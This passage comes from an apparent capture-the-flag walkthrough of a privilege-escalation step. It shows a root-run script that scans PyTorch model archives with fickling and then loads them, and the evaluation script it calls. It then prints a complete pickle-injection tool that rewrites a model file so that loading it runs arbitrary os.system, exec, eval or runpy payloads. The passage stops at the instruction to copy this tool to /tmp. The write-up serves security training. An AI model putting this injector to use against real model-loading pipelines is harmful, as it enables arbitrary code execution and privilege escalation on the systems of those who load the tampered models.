</span></span><span style=display:flex><span>    <span style=color:#928374;font-style:italic># POSIX tar archive (older PyTorch format)</span>
</span></span><span style=display:flex><span>    /usr/bin/tar -xf <span style=color:#b8bb26>&#34;</span>$MODEL_FILE<span style=color:#b8bb26>&#34;</span> -C <span style=color:#b8bb26>&#34;</span>$TEMP_DIR<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>elif</span> <span style=color:#fe8019>[[</span> <span style=color:#b8bb26>&#34;</span>$file_type<span style=color:#b8bb26>&#34;</span> <span style=color:#fe8019>==</span> *<span style=color:#b8bb26>&#34;Zip archive data&#34;</span>* <span style=color:#fe8019>]]</span>; <span style=color:#fe8019>then</span>
</span></span><span style=display:flex><span>    <span style=color:#928374;font-style:italic># Zip archive (newer PyTorch format)</span>
</span></span><span style=display:flex><span>    /usr/bin/unzip -q <span style=color:#b8bb26>&#34;</span>$MODEL_FILE<span style=color:#b8bb26>&#34;</span> -d <span style=color:#b8bb26>&#34;</span>$TEMP_DIR<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>else</span>
</span></span><span style=display:flex><span>    /usr/bin/echo <span style=color:#b8bb26>&#34;[!] Unknown or unsupported file format for </span>$MODEL_FILE<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span>    <span style=color:#fabd2f>exit</span> <span style=color:#d3869b>2</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>fi</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>/usr/bin/find <span style=color:#b8bb26>&#34;</span>$TEMP_DIR<span style=color:#b8bb26>&#34;</span> -type f <span style=color:#b8bb26>\(</span> -name <span style=color:#b8bb26>&#34;*.pkl&#34;</span> -o -name <span style=color:#b8bb26>&#34;pickle&#34;</span> <span style=color:#b8bb26>\)</span> -print0 | <span style=color:#fe8019>while</span> IFS<span style=color:#fe8019>=</span> <span style=color:#fabd2f>read</span> -r -d <span style=color:#b8bb26>$&#39;\0&#39;</span> extracted_pkl; <span style=color:#fe8019>do</span>
</span></span><span style=display:flex><span>    fickling_output<span style=color:#fe8019>=</span><span style=color:#fe8019>$(</span>/usr/local/bin/fickling -s --json-output /dev/fd/1 <span style=color:#b8bb26>&#34;</span>$extracted_pkl<span style=color:#b8bb26>&#34;</span><span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>if</span> /usr/bin/echo <span style=color:#b8bb26>&#34;</span>$fickling_output<span style=color:#b8bb26>&#34;</span> | /usr/bin/jq -e <span style=color:#b8bb26>&#39;select(.severity == &#34;OVERTLY_MALICIOUS&#34;)&#39;</span> &gt;/dev/null; <span style=color:#fe8019>then</span>
</span></span><span style=display:flex><span>        /usr/bin/echo <span style=color:#b8bb26>&#34;[!] Model </span>$MODEL_FILE<span style=color:#b8bb26> contains OVERTLY_MALICIOUS components and will be deleted.&#34;</span>
</span></span><span style=display:flex><span>        /bin/rm <span style=color:#b8bb26>&#34;</span>$MODEL_FILE<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>break</span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>fi</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>done</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>/usr/bin/find <span style=color:#b8bb26>&#34;</span>$TEMP_DIR<span style=color:#b8bb26>&#34;</span> -type f -exec /bin/rm <span style=color:#fe8019>{}</span> +
</span></span><span style=display:flex><span>/bin/rm -rf <span style=color:#b8bb26>&#34;</span>$TEMP_DIR<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> <span style=color:#fe8019>[</span> -f <span style=color:#b8bb26>&#34;</span>$MODEL_FILE<span style=color:#b8bb26>&#34;</span> <span style=color:#fe8019>]</span>; <span style=color:#fe8019>then</span>
</span></span><span style=display:flex><span>    /usr/bin/echo <span style=color:#b8bb26>&#34;[+] Model </span>$MODEL_FILE<span style=color:#b8bb26> is considered safe. Processing...&#34;</span>
</span></span><span style=display:flex><span>    /usr/bin/python3 <span style=color:#b8bb26>&#34;</span>$PYTHON_SCRIPT<span style=color:#b8bb26>&#34;</span> <span style=color:#b8bb26>&#34;</span>$MODEL_FILE<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>fi</span>
</span></span></code></pre></div><p>The file requires one argument, which is the location of the model file. The model file should be in either <code>tar</code> or <code>zip</code> format.
It then extracts the archive in <code>/opt/temp</code>. It then uses a static code analyzer called <code>fickling</code> to check if any of the serialized pickle files extracted in <code>/opt/temp</code> is malicious.
If everything is fine, it finally runs <code>/models/evaluate_models.py</code> script with the model file as its argument.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#fe8019>import</span> torch
</span></span><span style=display:flex><span><span style=color:#fe8019>import</span> torch.nn <span style=color:#fe8019>as</span> nn
</span></span><span style=display:flex><span><span style=color:#fe8019>from</span> torchvision <span style=color:#fe8019>import</span> transforms
</span></span><span style=display:flex><span><span style=color:#fe8019>from</span> torchvision.datasets <span style=color:#fe8019>import</span> CIFAR10
</span></span><span style=display:flex><span><span style=color:#fe8019>from</span> torch.utils.data <span style=color:#fe8019>import</span> DataLoader, Subset
</span></span><span style=display:flex><span><span style=color:#fe8019>import</span> numpy <span style=color:#fe8019>as</span> np
</span></span><span style=display:flex><span><span style=color:#fe8019>import</span> sys
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>class</span> CustomCNN(nn<span style=color:#fe8019>.</span>Module):
</span></span><span style=display:flex><span>    <span style=color:#fe8019>def</span> __init__(self):
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>super</span>(CustomCNN, self)<span style=color:#fe8019>.</span>__init__()
</span></span><span style=display:flex><span>        self<span style=color:#fe8019>.</span>conv1 <span style=color:#fe8019>=</span> nn<span style=color:#fe8019>.</span>Conv2d(in_channels<span style=color:#fe8019>=</span><span style=color:#d3869b>3</span>, out_channels<span style=color:#fe8019>=</span><span style=color:#d3869b>16</span>, kernel_size<span style=color:#fe8019>=</span><span style=color:#d3869b>3</span>, padding<span style=color:#fe8019>=</span><span style=color:#d3869b>1</span>)
</span></span><span style=display:flex><span>        self<span style=color:#fe8019>.</span>conv2 <span style=color:#fe8019>=</span> nn<span style=color:#fe8019>.</span>Conv2d(in_channels<span style=color:#fe8019>=</span><span style=color:#d3869b>16</span>, out_channels<span style=color:#fe8019>=</span><span style=color:#d3869b>32</span>, kernel_size<span style=color:#fe8019>=</span><span style=color:#d3869b>3</span>, padding<span style=color:#fe8019>=</span><span style=color:#d3869b>1</span>)
</span></span><span style=display:flex><span>        self<span style=color:#fe8019>.</span>pool <span style=color:#fe8019>=</span> nn<span style=color:#fe8019>.</span>MaxPool2d(kernel_size<span style=color:#fe8019>=</span><span style=color:#d3869b>2</span>, stride<span style=color:#fe8019>=</span><span style=color:#d3869b>2</span>, padding<span style=color:#fe8019>=</span><span style=color:#d3869b>0</span>)
</span></span><span style=display:flex><span>        self<span style=color:#fe8019>.</span>fc1 <span style=color:#fe8019>=</span> nn<span style=color:#fe8019>.</span>Linear(in_features<span style=color:#fe8019>=</span><span style=color:#d3869b>32</span> <span style=color:#fe8019>*</span> <span style=color:#d3869b>8</span> <span style=color:#fe8019>*</span> <span style=color:#d3869b>8</span>, out_features<span style=color:#fe8019>=</span><span style=color:#d3869b>128</span>)
</span></span><span style=display:flex><span>        self<span style=color:#fe8019>.</span>fc2 <span style=color:#fe8019>=</span> nn<span style=color:#fe8019>.</span>Linear(in_features<span style=color:#fe8019>=</span><span style=color:#d3869b>128</span>, out_features<span style=color:#fe8019>=</span><span style=color:#d3869b>10</span>)
</span></span><span style=display:flex><span>        self<span style=color:#fe8019>.</span>relu <span style=color:#fe8019>=</span> nn<span style=color:#fe8019>.</span>ReLU()
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>def</span> <span style=color:#fabd2f>forward</span>(self, x):
</span></span><span style=display:flex><span>        x <span style=color:#fe8019>=</span> self<span style=color:#fe8019>.</span>pool(self<span style=color:#fe8019>.</span>relu(self<span style=color:#fe8019>.</span>conv1(x)))
</span></span><span style=display:flex><span>        x <span style=color:#fe8019>=</span> self<span style=color:#fe8019>.</span>pool(self<span style=color:#fe8019>.</span>relu(self<span style=color:#fe8019>.</span>conv2(x)))
</span></span><span style=display:flex><span>        x <span style=color:#fe8019>=</span> x<span style=color:#fe8019>.</span>view(<span style=color:#fe8019>-</span><span style=color:#d3869b>1</span>, <span style=color:#d3869b>32</span> <span style=color:#fe8019>*</span> <span style=color:#d3869b>8</span> <span style=color:#fe8019>*</span> <span style=color:#d3869b>8</span>)
</span></span><span style=display:flex><span>        x <span style=color:#fe8019>=</span> self<span style=color:#fe8019>.</span>relu(self<span style=color:#fe8019>.</span>fc1(x))
</span></span><span style=display:flex><span>        x <span style=color:#fe8019>=</span> self<span style=color:#fe8019>.</span>fc2(x)
</span></span><span style=display:flex><span>        <span style=color:#fe8019>return</span> x
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>def</span> <span style=color:#fabd2f>load_model</span>(model_path):
</span></span><span style=display:flex><span>    model <span style=color:#fe8019>=</span> CustomCNN()
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    state_dict <span style=color:#fe8019>=</span> torch<span style=color:#fe8019>.</span>load(model_path)
</span></span><span style=display:flex><span>    model<span style=color:#fe8019>.</span>load_state_dict(state_dict)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    model<span style=color:#fe8019>.</span>eval()
</span></span><span style=display:flex><span>    <span style=color:#fe8019>return</span> model
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>def</span> <span style=color:#fabd2f>prepare_dataloader</span>(batch_size<span style=color:#fe8019>=</span><span style=color:#d3869b>32</span>):
</span></span><span style=display:flex><span>    transform <span style=color:#fe8019>=</span> transforms<span style=color:#fe8019>.</span>Compose([
</span></span><span style=display:flex><span>        transforms<span style=color:#fe8019>.</span>RandomHorizontalFlip(),
</span></span><span style=display:flex><span>        transforms<span style=color:#fe8019>.</span>RandomCrop(<span style=color:#d3869b>32</span>, padding<span style=color:#fe8019>=</span><span style=color:#d3869b>4</span>),
</span></span><span style=display:flex><span>        transforms<span style=color:#fe8019>.</span>ToTensor(),
</span></span><span style=display:flex><span>        transforms<span style=color:#fe8019>.</span>Normalize(mean<span style=color:#fe8019>=</span>[<span style=color:#d3869b>0.4914</span>, <span style=color:#d3869b>0.4822</span>, <span style=color:#d3869b>0.4465</span>], std<span style=color:#fe8019>=</span>[<span style=color:#d3869b>0.2023</span>, <span style=color:#d3869b>0.1994</span>, <span style=color:#d3869b>0.2010</span>]),
</span></span><span style=display:flex><span>    ])
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    dataset <span style=color:#fe8019>=</span> CIFAR10(root<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#39;/root/datasets/&#39;</span>, train<span style=color:#fe8019>=</span><span style=color:#fe8019>False</span>, download<span style=color:#fe8019>=</span><span style=color:#fe8019>False</span>, transform<span style=color:#fe8019>=</span>transform)
</span></span><span style=display:flex><span>    subset <span style=color:#fe8019>=</span> Subset(dataset, indices<span style=color:#fe8019>=</span>np<span style=color:#fe8019>.</span>random<span style=color:#fe8019>.</span>choice(<span style=color:#fabd2f>len</span>(dataset), <span style=color:#d3869b>64</span>, replace<span style=color:#fe8019>=</span><span style=color:#fe8019>False</span>))
</span></span><span style=display:flex><span>    dataloader <span style=color:#fe8019>=</span> DataLoader(subset, batch_size<span style=color:#fe8019>=</span>batch_size, shuffle<span style=color:#fe8019>=</span><span style=color:#fe8019>False</span>)
</span></span><span style=display:flex><span>    <span style=color:#fe8019>return</span> dataloader
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>def</span> <span style=color:#fabd2f>evaluate_model</span>(model, dataloader):
</span></span><span style=display:flex><span>    correct <span style=color:#fe8019>=</span> <span style=color:#d3869b>0</span>
</span></span><span style=display:flex><span>    total <span style=color:#fe8019>=</span> <span style=color:#d3869b>0</span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>with</span> torch<span style=color:#fe8019>.</span>no_grad():
</span></span><span style=display:flex><span>        <span style=color:#fe8019>for</span> images, labels <span style=color:#fe8019>in</span> dataloader:
</span></span><span style=display:flex><span>            outputs <span style=color:#fe8019>=</span> model(images)
</span></span><span style=display:flex><span>            _, predicted <span style=color:#fe8019>=</span> torch<span style=color:#fe8019>.</span>max(outputs<span style=color:#fe8019>.</span>data, <span style=color:#d3869b>1</span>)
</span></span><span style=display:flex><span>            total <span style=color:#fe8019>+=</span> labels<span style=color:#fe8019>.</span>size(<span style=color:#d3869b>0</span>)
</span></span><span style=display:flex><span>            correct <span style=color:#fe8019>+=</span> (predicted <span style=color:#fe8019>==</span> labels)<span style=color:#fe8019>.</span>sum()<span style=color:#fe8019>.</span>item()
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    accuracy <span style=color:#fe8019>=</span> <span style=color:#d3869b>100</span> <span style=color:#fe8019>*</span> correct <span style=color:#fe8019>/</span> total
</span></span><span style=display:flex><span>    <span style=color:#fabd2f>print</span>(<span style=color:#b8bb26>f</span><span style=color:#b8bb26>&#39;[+] Accuracy of the model on the test dataset: </span><span style=color:#b8bb26>{</span>accuracy<span style=color:#b8bb26>:</span><span style=color:#b8bb26>.2f</span><span style=color:#b8bb26>}</span><span style=color:#b8bb26>%&#39;</span>)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>def</span> <span style=color:#fabd2f>main</span>(model_path):
</span></span><span style=display:flex><span>    model <span style=color:#fe8019>=</span> load_model(model_path)
</span></span><span style=display:flex><span>    <span style=color:#fabd2f>print</span>(<span style=color:#b8bb26>&#34;[+] Loaded Model.&#34;</span>)
</span></span><span style=display:flex><span>    dataloader <span style=color:#fe8019>=</span> prepare_dataloader()
</span></span><span style=display:flex><span>    <span style=color:#fabd2f>print</span>(<span style=color:#b8bb26>&#34;[+] Dataloader ready. Evaluating model...&#34;</span>)
</span></span><span style=display:flex><span>    evaluate_model(model, dataloader)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> __name__ <span style=color:#fe8019>==</span> <span style=color:#b8bb26>&#34;__main__&#34;</span>:
</span></span><span style=display:flex><span>    <span style=color:#fe8019>if</span> <span style=color:#fabd2f>len</span>(sys<span style=color:#fe8019>.</span>argv) <span style=color:#fe8019>&lt;</span> <span style=color:#d3869b>2</span>:
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>print</span>(<span style=color:#b8bb26>&#34;Usage: python script.py &lt;path_to_model.pth&gt;&#34;</span>)
</span></span><span style=display:flex><span>    <span style=color:#fe8019>else</span>:
</span></span><span style=display:flex><span>        model_path <span style=color:#fe8019>=</span> sys<span style=color:#fe8019>.</span>argv[<span style=color:#d3869b>1</span>]  <span style=color:#928374;font-style:italic># Path to the .pth file</span>
</span></span><span style=display:flex><span>        main(model_path)
</span></span></code></pre></div><p>In order for us to load a malicious pickle file and run arbitrary commands, we need to create a pickle file that bypasses the checks of<code>fickling</code>.
After some searching, I found another blog by Hiddenlayer: <a href=https://hiddenlayer.com/research/weaponizing-machine-learning-models-with-ransomware/>Weaponizing ML Models with Ransomware</a>. The blog post explains some techniques which we can use to modify exisitng models to execute arbitrary commands.
There&rsquo;s already a pretrained PyTorch model in the <code>/models</code> directory. <code>.pth</code> files are used in PyTorch to sore model weights and other relevant infomation for deep learning models. If we extract the <code>demo_model.pth</code> file we can see there&rsquo;s a <code>data.pkl</code> file inside it.</p><figure><img src=/img/blurry/Pasted%20image%2020241013170347.webp></figure><p>We can inject the model’s <code>data.pkl</code> file with an instruction to execute arbitrary code using the python script from the blog.</p><h3 id=privilege-escalation-1><a href=#privilege-escalation-1 class=anchor-head aria-label=Anchor></a>Privilege Escalation</h3><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#fe8019>import</span> os
</span></span><span style=display:flex><span><span style=color:#fe8019>import</span> argparse
</span></span><span style=display:flex><span><span style=color:#fe8019>import</span> pickle
</span></span><span style=display:flex><span><span style=color:#fe8019>import</span> struct
</span></span><span style=display:flex><span><span style=color:#fe8019>import</span> shutil
</span></span><span style=display:flex><span><span style=color:#fe8019>from</span> pathlib <span style=color:#fe8019>import</span> Path
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>import</span> torch
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>class</span> PickleInject():
</span></span><span style=display:flex><span>    <span style=color:#b8bb26>&#34;&#34;&#34;Pickle injection. Pretends to be a &#34;module&#34; to work with torch.&#34;&#34;&#34;</span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>def</span> __init__(self, inj_objs, first<span style=color:#fe8019>=</span><span style=color:#fe8019>True</span>):
</span></span><span style=display:flex><span>        self<span style=color:#fe8019>.</span>__name__ <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#34;pickle_inject&#34;</span>
</span></span><span style=display:flex><span>        self<span style=color:#fe8019>.</span>inj_objs <span style=color:#fe8019>=</span> inj_objs
</span></span><span style=display:flex><span>        self<span style=color:#fe8019>.</span>first <span style=color:#fe8019>=</span> first
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>class</span> _Pickler(pickle<span style=color:#fe8019>.</span>_Pickler):
</span></span><span style=display:flex><span>        <span style=color:#b8bb26>&#34;&#34;&#34;Reimplementation of Pickler with support for injection&#34;&#34;&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fe8019>def</span> __init__(self, file, protocol, inj_objs, first<span style=color:#fe8019>=</span><span style=color:#fe8019>True</span>):
</span></span><span style=display:flex><span>            <span style=color:#fabd2f>super</span>()<span style=color:#fe8019>.</span>__init__(file, protocol)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>            self<span style=color:#fe8019>.</span>inj_objs <span style=color:#fe8019>=</span> inj_objs
</span></span><span style=display:flex><span>            self<span style=color:#fe8019>.</span>first <span style=color:#fe8019>=</span> first
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>        <span style=color:#fe8019>def</span> <span style=color:#fabd2f>dump</span>(self, obj):
</span></span><span style=display:flex><span>            <span style=color:#b8bb26>&#34;&#34;&#34;Pickle data, inject object before or after&#34;&#34;&#34;</span>
</span></span><span style=display:flex><span>            <span style=color:#fe8019>if</span> self<span style=color:#fe8019>.</span>proto <span style=color:#fe8019>&gt;=</span> <span style=color:#d3869b>2</span>:
</span></span><span style=display:flex><span>                self<span style=color:#fe8019>.</span>write(pickle<span style=color:#fe8019>.</span>PROTO <span style=color:#fe8019>+</span> struct<span style=color:#fe8019>.</span>pack(<span style=color:#b8bb26>&#34;&lt;B&#34;</span>, self<span style=color:#fe8019>.</span>proto))
</span></span><span style=display:flex><span>            <span style=color:#fe8019>if</span> self<span style=color:#fe8019>.</span>proto <span style=color:#fe8019>&gt;=</span> <span style=color:#d3869b>4</span>:
</span></span><span style=display:flex><span>                self<span style=color:#fe8019>.</span>framer<span style=color:#fe8019>.</span>start_framing()
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>            <span style=color:#928374;font-style:italic># Inject the object(s) before the user-supplied data?</span>
</span></span><span style=display:flex><span>            <span style=color:#fe8019>if</span> self<span style=color:#fe8019>.</span>first:
</span></span><span style=display:flex><span>                <span style=color:#928374;font-style:italic># Pickle injected objects</span>
</span></span><span style=display:flex><span>                <span style=color:#fe8019>for</span> inj_obj <span style=color:#fe8019>in</span> self<span style=color:#fe8019>.</span>inj_objs:
</span></span><span style=display:flex><span>                    self<span style=color:#fe8019>.</span>save(inj_obj)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>            <span style=color:#928374;font-style:italic># Pickle user-supplied data</span>
</span></span><span style=display:flex><span>            self<span style=color:#fe8019>.</span>save(obj)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>            <span style=color:#928374;font-style:italic># Inject the object(s) after the user-supplied data?</span>
</span></span><span style=display:flex><span>            <span style=color:#fe8019>if</span> <span style=color:#fe8019>not</span> self<span style=color:#fe8019>.</span>first:
</span></span><span style=display:flex><span>                <span style=color:#928374;font-style:italic># Pickle injected objects</span>
</span></span><span style=display:flex><span>                <span style=color:#fe8019>for</span> inj_obj <span style=color:#fe8019>in</span> self<span style=color:#fe8019>.</span>inj_objs:
</span></span><span style=display:flex><span>                    self<span style=color:#fe8019>.</span>save(inj_obj)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>            self<span style=color:#fe8019>.</span>write(pickle<span style=color:#fe8019>.</span>STOP)
</span></span><span style=display:flex><span>            self<span style=color:#fe8019>.</span>framer<span style=color:#fe8019>.</span>end_framing()
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>def</span> <span style=color:#fabd2f>Pickler</span>(self, file, protocol):
</span></span><span style=display:flex><span>        <span style=color:#928374;font-style:italic># Initialise the pickler interface with the injected object</span>
</span></span><span style=display:flex><span>        <span style=color:#fe8019>return</span> self<span style=color:#fe8019>.</span>_Pickler(file, protocol, self<span style=color:#fe8019>.</span>inj_objs)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>class</span> _PickleInject():
</span></span><span style=display:flex><span>        <span style=color:#b8bb26>&#34;&#34;&#34;Base class for pickling injected commands&#34;&#34;&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fe8019>def</span> __init__(self, args, command<span style=color:#fe8019>=</span><span style=color:#fe8019>None</span>):
</span></span><span style=display:flex><span>            self<span style=color:#fe8019>.</span>command <span style=color:#fe8019>=</span> command
</span></span><span style=display:flex><span>            self<span style=color:#fe8019>.</span>args <span style=color:#fe8019>=</span> args
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>        <span style=color:#fe8019>def</span> <span style=color:#fabd2f>__reduce__</span>(self):
</span></span><span style=display:flex><span>            <span style=color:#fe8019>return</span> self<span style=color:#fe8019>.</span>command, (self<span style=color:#fe8019>.</span>args,)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>class</span> System(_PickleInject):
</span></span><span style=display:flex><span>        <span style=color:#b8bb26>&#34;&#34;&#34;Create os.system command&#34;&#34;&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fe8019>def</span> __init__(self, args):
</span></span><span style=display:flex><span>            <span style=color:#fabd2f>super</span>()<span style=color:#fe8019>.</span>__init__(args, command<span style=color:#fe8019>=</span>os<span style=color:#fe8019>.</span>system)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>class</span> Exec(_PickleInject):
</span></span><span style=display:flex><span>        <span style=color:#b8bb26>&#34;&#34;&#34;Create exec command&#34;&#34;&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fe8019>def</span> __init__(self, args):
</span></span><span style=display:flex><span>            <span style=color:#fabd2f>super</span>()<span style=color:#fe8019>.</span>__init__(args, command<span style=color:#fe8019>=</span>exec)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>class</span> Eval(_PickleInject):
</span></span><span style=display:flex><span>        <span style=color:#b8bb26>&#34;&#34;&#34;Create eval command&#34;&#34;&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fe8019>def</span> __init__(self, args):
</span></span><span style=display:flex><span>            <span style=color:#fabd2f>super</span>()<span style=color:#fe8019>.</span>__init__(args, command<span style=color:#fe8019>=</span><span style=color:#fabd2f>eval</span>)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>class</span> RunPy(_PickleInject):
</span></span><span style=display:flex><span>        <span style=color:#b8bb26>&#34;&#34;&#34;Create runpy command&#34;&#34;&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fe8019>def</span> __init__(self, args):
</span></span><span style=display:flex><span>            <span style=color:#fe8019>import</span> runpy
</span></span><span style=display:flex><span>            <span style=color:#fabd2f>super</span>()<span style=color:#fe8019>.</span>__init__(args, command<span style=color:#fe8019>=</span>runpy<span style=color:#fe8019>.</span>_run_code)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>        <span style=color:#fe8019>def</span> <span style=color:#fabd2f>__reduce__</span>(self):
</span></span><span style=display:flex><span>            <span style=color:#fe8019>return</span> self<span style=color:#fe8019>.</span>command, (self<span style=color:#fe8019>.</span>args,{})
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>parser <span style=color:#fe8019>=</span> argparse<span style=color:#fe8019>.</span>ArgumentParser(description<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;PyTorch Pickle Inject&#34;</span>)
</span></span><span style=display:flex><span>parser<span style=color:#fe8019>.</span>add_argument(<span style=color:#b8bb26>&#34;model&#34;</span>, <span style=color:#fabd2f>type</span><span style=color:#fe8019>=</span>Path)
</span></span><span style=display:flex><span>parser<span style=color:#fe8019>.</span>add_argument(<span style=color:#b8bb26>&#34;command&#34;</span>, choices<span style=color:#fe8019>=</span>[<span style=color:#b8bb26>&#34;system&#34;</span>, <span style=color:#b8bb26>&#34;exec&#34;</span>, <span style=color:#b8bb26>&#34;eval&#34;</span>, <span style=color:#b8bb26>&#34;runpy&#34;</span>])
</span></span><span style=display:flex><span>parser<span style=color:#fe8019>.</span>add_argument(<span style=color:#b8bb26>&#34;args&#34;</span>)
</span></span><span style=display:flex><span>parser<span style=color:#fe8019>.</span>add_argument(<span style=color:#b8bb26>&#34;-v&#34;</span>, <span style=color:#b8bb26>&#34;--verbose&#34;</span>, help<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;verbose logging&#34;</span>, action<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;count&#34;</span>)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>args <span style=color:#fe8019>=</span> parser<span style=color:#fe8019>.</span>parse_args()
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>command_args <span style=color:#fe8019>=</span> args<span style=color:#fe8019>.</span>args
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic># If the command arg is a path, read the file contents</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> os<span style=color:#fe8019>.</span>path<span style=color:#fe8019>.</span>isfile(command_args):
</span></span><span style=display:flex><span>    <span style=color:#fe8019>with</span> <span style=color:#fabd2f>open</span>(command_args, <span style=color:#b8bb26>&#34;r&#34;</span>) <span style=color:#fe8019>as</span> in_file:
</span></span><span style=display:flex><span>        command_args <span style=color:#fe8019>=</span> in_file<span style=color:#fe8019>.</span>read()
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic># Construct payload</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> args<span style=color:#fe8019>.</span>command <span style=color:#fe8019>==</span> <span style=color:#b8bb26>&#34;system&#34;</span>:
</span></span><span style=display:flex><span>    payload <span style=color:#fe8019>=</span> PickleInject<span style=color:#fe8019>.</span>System(command_args)
</span></span><span style=display:flex><span><span style=color:#fe8019>elif</span> args<span style=color:#fe8019>.</span>command <span style=color:#fe8019>==</span> <span style=color:#b8bb26>&#34;exec&#34;</span>:
</span></span><span style=display:flex><span>    payload <span style=color:#fe8019>=</span> PickleInject<span style=color:#fe8019>.</span>Exec(command_args)
</span></span><span style=display:flex><span><span style=color:#fe8019>elif</span> args<span style=color:#fe8019>.</span>command <span style=color:#fe8019>==</span> <span style=color:#b8bb26>&#34;eval&#34;</span>:
</span></span><span style=display:flex><span>    payload <span style=color:#fe8019>=</span> PickleInject<span style=color:#fe8019>.</span>Eval(command_args)
</span></span><span style=display:flex><span><span style=color:#fe8019>elif</span> args<span style=color:#fe8019>.</span>command <span style=color:#fe8019>==</span> <span style=color:#b8bb26>&#34;runpy&#34;</span>:
</span></span><span style=display:flex><span>    payload <span style=color:#fe8019>=</span> PickleInject<span style=color:#fe8019>.</span>RunPy(command_args)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic># Backup the model</span>
</span></span><span style=display:flex><span>backup_path <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#34;</span><span style=color:#b8bb26>{}</span><span style=color:#b8bb26>.bak&#34;</span><span style=color:#fe8019>.</span>format(args<span style=color:#fe8019>.</span>model)
</span></span><span style=display:flex><span>shutil<span style=color:#fe8019>.</span>copyfile(args<span style=color:#fe8019>.</span>model, backup_path)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic># Save the model with the injected payload</span>
</span></span><span style=display:flex><span>torch<span style=color:#fe8019>.</span>save(torch<span style=color:#fe8019>.</span>load(args<span style=color:#fe8019>.</span>model), f<span style=color:#fe8019>=</span>args<span style=color:#fe8019>.</span>model, pickle_module<span style=color:#fe8019>=</span>PickleInject([payload]))
</span></span></code></pre></div><p>Copy the code to the <code>/tmp/</code> folder.
